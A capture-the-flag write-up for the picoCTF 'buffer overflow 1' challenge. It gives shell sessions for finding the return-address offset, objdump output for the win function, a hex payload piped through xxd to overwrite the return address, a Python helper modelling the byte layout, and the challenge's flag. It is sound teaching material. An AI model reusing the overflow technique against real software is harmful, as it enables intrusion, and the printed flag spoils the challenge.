Binary Exploitation 200: buffer overflow 1
Challenge
Okay now you’re cooking! This time can you overflow the buffer and return to the flag function in this program? You can find it in /problems/buffer-overflow-1_2_86cbe4de3cdc8986063c379e61f669ba on the shell server. Source.
Solution
Using an entirely manual binary search we find out which bytes we actually control:
hxr@pico-2018-shell-1:/problems/buffer-overflow-1_2_86cbe4de3cdc8986063c379e61f669ba$ ./vuln
Please enter your string:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab
Okay, time to return... Fingers Crossed... Jumping to 0x62616161
Segmentation fault
...
hxr@pico-2018-shell-1:/problems/buffer-overflow-1_2_86cbe4de3cdc8986063c379e61f669ba$ ./vuln
Please enter your string:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadcba
Okay, time to return... Fingers Crossed... Jumping to 0x61626364
Segmentation fault
OK, good. Now that we have control of the return address, we just need to point it to wherever the flag is printed. I guess that’s the win function:
$ objdump -x -d vuln
....
080485cb <win>:
80485cb: 55 push %ebp
80485cc: 89 e5 mov %esp,%ebp
80485ce: 83 ec 58 sub $0x58,%esp
80485d1: 83 ec 08 sub $0x8,%esp
80485d4: 68 50 87 04 08 push $0x8048750
80485d9: 68 52 87 04 08 push $0x8048752
80485de: e8 bd fe ff ff call 80484a0 <fopen@plt>
80485e3: 83 c4 10 add $0x10,%esp
80485e6: 89 45 f4 mov %eax,-0xc(%ebp)
80485e9: 83 7d f4 00 cmpl $0x0,-0xc(%ebp)
80485ed: 75 1a jne 8048609 <win+0x3e>
80485ef: 83 ec 0c sub $0xc,%esp
...
So we want to return to 0x080485cb.
First I experimented with some known characters in order to figure out the byte mapping, because little endian doesn’t work with xxd -r:
$ echo -n 'ÏÖ' | xxd -e # Little endian
00000000: 96c38fc3 ....
$ echo -n 'ÏÖ' | xxd # Big endian
00000000: c38f c396 ....
$ # 080485cb < our target string
$ echo '00000000: cb85 0408' | xxd -r
$ # And the mapping is a bunch of unprintable characters.
This needs to be prefixed with a known length of buffer so we’ll just construct something xxd is happy with:
00000000: 61616161 61616161 61616161 61616161
00000010: 61616161 61616161 61616161 61616161
00000020: 61616161 61616161 61616161 cb850408
And then run this on the server:
$ echo '00000000: 61616161 61616161 61616161 61616161
00000010: 61616161 61616161 61616161 61616161
00000020: 61616161 61616161 61616161 cb850408' | xxd -r | ./vuln
Please enter your string:
Okay, time to return... Fingers Crossed... Jumping to 0x80485cb
picoCTF{addr3ss3s_ar3_3asy56a7b196}Segmentation fault
It works!!!
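As an added example (not part of the original writeup), the Python below models what the sessions above show: the four input bytes that land on the saved return address are read as a little-endian 32-bit value, and the constructed xxd dump decodes to exactly that layout. The offset of 44 is taken from the "dcba" run above and the win address from the objdump listing; both are assumptions about this binary, not read from its source.

```python
import struct

# Offset of the saved return address within the input, derived from the
# session above: 44 bytes of 'a' followed by "dcba" printed 0x61626364.
RET_OFFSET = 44
WIN_ADDR = 0x080485CB  # address of <win> from the objdump listing above


def jumped_to(user_input: bytes) -> int:
    """Return the value the program reports after "Jumping to".

    The four bytes overwriting the saved EIP are interpreted as a
    little-endian 32-bit integer, which is why "dcba" shows up as
    0x61626364 and "aaab" as 0x62616161.
    """
    if len(user_input) < RET_OFFSET + 4:
        raise ValueError("input too short to reach the return address")
    (value,) = struct.unpack("<I", user_input[RET_OFFSET:RET_OFFSET + 4])
    return value


def little_endian_bytes(addr: int) -> bytes:
    """Byte order the address must have in memory, i.e. what the
    'cb850408' group in the constructed dump encodes for 0x080485cb."""
    return struct.pack("<I", addr)


def decode_xxd_dump(dump: str) -> bytes:
    """Reverse a plain xxd dump (the job `xxd -r` does), so a hand-written
    dump can be checked before it is piped anywhere. Anything after the
    double space that xxd uses to separate the ASCII column is ignored."""
    out = bytearray()
    for line in dump.strip().splitlines():
        _offset, hexpart = line.split(":", 1)
        hexpart = hexpart.strip().split("  ")[0]
        out += bytes.fromhex(hexpart.replace(" ", ""))
    return bytes(out)


# The dump constructed in the writeup, embedded here so it can be checked.
PAYLOAD_DUMP = """\
00000000: 61616161 61616161 61616161 61616161
00000010: 61616161 61616161 61616161 61616161
00000020: 61616161 61616161 61616161 cb850408"""
```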
Flag
picoCTF{addr3ss3s_ar3_3asy56a7b196}